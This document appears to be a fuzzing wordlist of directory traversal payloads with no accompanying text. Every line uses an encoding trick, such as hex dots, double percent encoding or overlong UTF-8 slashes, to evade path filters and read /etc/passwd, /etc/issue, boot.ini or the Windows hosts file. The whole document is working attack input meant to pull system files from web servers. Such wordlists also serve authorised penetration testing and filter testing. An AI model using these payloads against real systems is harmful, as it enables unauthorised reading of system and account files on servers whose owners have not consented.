-0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025passwd -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025issue -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025boot.ini -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025passwd -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025issue -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025boot.ini -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025passwd -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025etc%uF025issue -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025boot.ini -0x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF0250x2e0x2e%uF025windows%uF025system32%uF025drivers%uF025etc%uF025hosts -0x2e0x2e%%32%%66etc%%32%%66passwd -0x2e0x2e%%32%%66etc%%32%%66issue -0x2e0x2e%%32%%66boot.ini -0x2e0x2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -0x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66passwd -0x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66issue -0x2e0x2e%%32%%660x2e0x2e%%32%%66boot.ini -0x2e0x2e%%32%%660x2e0x2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66passwd -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66issue -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66boot.ini -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66passwd -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66issue -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66boot.ini -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66passwd -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66issue -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66boot.ini -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66passwd -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66etc%%32%%66issue -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66boot.ini -0x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%660x2e0x2e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts -0x2e0x2e%%35%%63etc%%35%%63passwd -0x2e0x2e%%35%%63etc%%35%%63issue -0x2e0x2e%%35%%63boot.ini -0x2e0x2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -0x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63passwd -0x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63issue -0x2e0x2e%%35%%630x2e0x2e%%35%%63boot.ini -0x2e0x2e%%35%%630x2e0x2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63passwd -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63issue -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63boot.ini -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63passwd -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63issue -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63boot.ini -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63passwd -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63issue -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63boot.ini -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63passwd -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63etc%%35%%63issue -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63boot.ini -0x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%630x2e0x2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts -0x2e0x2e%e0%80%afetc%e0%80%afpasswd -0x2e0x2e%e0%80%afetc%e0%80%afissue -0x2e0x2e%e0%80%afboot.ini -0x2e0x2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afpasswd -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afissue -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afboot.ini -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afpasswd -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afissue -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afboot.ini -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afpasswd -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afissue -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afboot.ini -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afpasswd -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afissue -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afboot.ini -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afpasswd -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afetc%e0%80%afissue -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afboot.ini -0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%af0x2e0x2e%e0%80%afwindows%e0%80%afsystem32%e0%80%afdrivers%e0%80%afetc%e0%80%afhosts -0x2e0x2e%25c1%259cetc%25c1%259cpasswd -0x2e0x2e%25c1%259cetc%25c1%259cissue -0x2e0x2e%25c1%259cboot.ini -0x2e0x2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cpasswd -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cissue -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cboot.ini -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cpasswd -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cissue -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cboot.ini -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cpasswd -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cissue -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cboot.ini -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cpasswd -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cissue -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cboot.ini -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cpasswd -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cetc%25c1%259cissue -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cboot.ini -0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259c0x2e0x2e%25c1%259cwindows%25c1%259csystem32%25c1%259cdrivers%25c1%259cetc%25c1%259chosts -0x2e0x2e%25c0%25afetc%25c0%25afpasswd -0x2e0x2e%25c0%25afetc%25c0%25afissue -0x2e0x2e%25c0%25afboot.ini -0x2e0x2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afpasswd -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afissue -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afboot.ini -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afpasswd -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afissue -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afboot.ini -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afpasswd -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afissue -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afboot.ini -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afpasswd -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afissue -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afboot.ini -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afpasswd -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afetc%25c0%25afissue -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afboot.ini -0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25af0x2e0x2e%25c0%25afwindows%25c0%25afsystem32%25c0%25afdrivers%25c0%25afetc%25c0%25afhosts -0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd -0x2e0x2e%f0%80%80%afetc%f0%80%80%afissue -0x2e0x2e%f0%80%80%afboot.ini -0x2e0x2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afissue -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afboot.ini -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afissue -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afboot.ini -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afissue -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afboot.ini -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afissue -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afboot.ini -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afetc%f0%80%80%afissue -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afboot.ini -0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%af0x2e0x2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts -0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afissue -0x2e0x2e%f8%80%80%80%afboot.ini -0x2e0x2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afissue -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afboot.ini -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afissue -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afboot.ini -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afissue -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afboot.ini -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afissue -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afboot.ini -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afissue -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afboot.ini -0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%af0x2e0x2e%f8%80%80%80%afwindows%f8%80%80%80%afsystem32%f8%80%80%80%afdrivers%f8%80%80%80%afetc%f8%80%80%80%afhosts -%c0.%c0./etc/passwd -%c0.%c0./etc/issue -%c0.%c0./boot.ini -%c0.%c0./windows/system32/drivers/etc/hosts -%c0.%c0./%c0.%c0./etc/passwd -%c0.%c0./%c0.%c0./etc/issue -%c0.%c0./%c0.%c0./boot.ini -%c0.%c0./%c0.%c0./windows/system32/drivers/etc/hosts -%c0.%c0./%c0.%c0./%c0.%c0./etc/passwd -%c0.%c0./%c0.%c0./%c0.%c0./etc/issue -%c0.%c0./%c0.%c0./%c0.%c0./boot.ini -%c0.%c0./%c0.%c0./%c0.%c0./windows/system32/drivers/etc/hosts -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./etc/passwd -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./etc/issue -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/system32/drivers/etc/hosts -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./etc/passwd -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./etc/issue -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/system32/drivers/etc/hosts -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./etc/passwd -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./etc/issue -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./boot.ini -%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./windows/system32/drivers/etc/hosts -%c0.%c0.\etc\passwd -%c0.%c0.\etc\issue -%c0.%c0.\boot.ini -%c0.%c0.\windows\system32\drivers\etc\hosts -%c0.%c0.\%c0.%c0.\etc\passwd -%c0.%c0.\%c0.%c0.\etc\issue -%c0.%c0.\%c0.%c0.\boot.ini -%c0.%c0.\%c0.%c0.\windows\system32\drivers\etc\hosts -%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\passwd -%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\issue -%c0.%c0.\%c0.%c0.\%c0.%c0.\boot.ini -%c0.%c0.\%c0.%c0.\%c0.%c0.\windows\system32\drivers\etc\hosts -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\passwd -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\issue -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\boot.ini -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\windows\system32\drivers\etc\hosts -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\passwd -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\issue -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\boot.ini -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\windows\system32\drivers\etc\hosts -%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\%c0.%c0.\etc\passwd 